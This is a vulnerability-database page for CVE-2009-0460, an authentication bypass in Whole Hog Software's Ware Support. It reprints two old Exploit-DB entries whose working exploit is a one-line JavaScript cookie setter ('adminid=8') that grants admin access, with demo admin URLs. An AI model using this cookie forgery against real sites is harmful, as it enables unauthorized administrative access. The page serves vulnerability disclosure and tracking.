CVE-2009-0460
published 2009-02-10CVE-2009-0460: Whole Hog Ware Support 1.x allows remote attackers to bypass authentication and obtain administrative access via an integer value in the adminid cookie.
PriorityP351high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.83%
84.9th percentile
Whole Hog Ware Support 1.x allows remote attackers to bypass authentication and obtain administrative access via an integer value in the adminid cookie.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wholehogsoftware | ware_support | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WholeHogSoftware Ware Support - Insecure Cookie Handling
exploitdb·2009-02-03
CVE-2009-0461 WholeHogSoftware Ware Support - Insecure Cookie Handling
WholeHogSoftware Ware Support - Insecure Cookie Handling
---
###########################################################################
[+] WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability
[+] Script :Ware Support
[+] Site :http://wholehogsoftware.com
[+] Detay :http://wholehogsoftware.com/index.php/page/ware_support
[+] Discovered By Mountassif Moad
[+] www.v4-team.com
[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "adminid=8; path=/";
DeMo :
http://www.wholehogsoftware.com/demo/support/admin/
# milw0rm.com [2009-02-03]
Exploit-DB
WholeHogSoftware Password Protect - Insecure Cookie Handling
exploitdb·2009-02-03
CVE-2009-0461 WholeHogSoftware Password Protect - Insecure Cookie Handling
WholeHogSoftware Password Protect - Insecure Cookie Handling
---
###########################################################################
[+] WholeHogSoftware Password Protect Insecure Cookie Handling Vulnerability
[+] Script :Password Protect
[+] Site :http://wholehogsoftware.com
[+] Detay :http://www.wholehogsoftware.com/index.php/page/password_protect_enhanced
[+] Discovered By Mountassif Moad
[+] www.v4-team.com
[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "adminid=8; path=/";
DeMo :
http://www.wholehogsoftware.com/demo/password_protect_enhanced/admin
# milw0rm.com [2009-02-03]
No writeups or analysis indexed.
2009-02-10
Published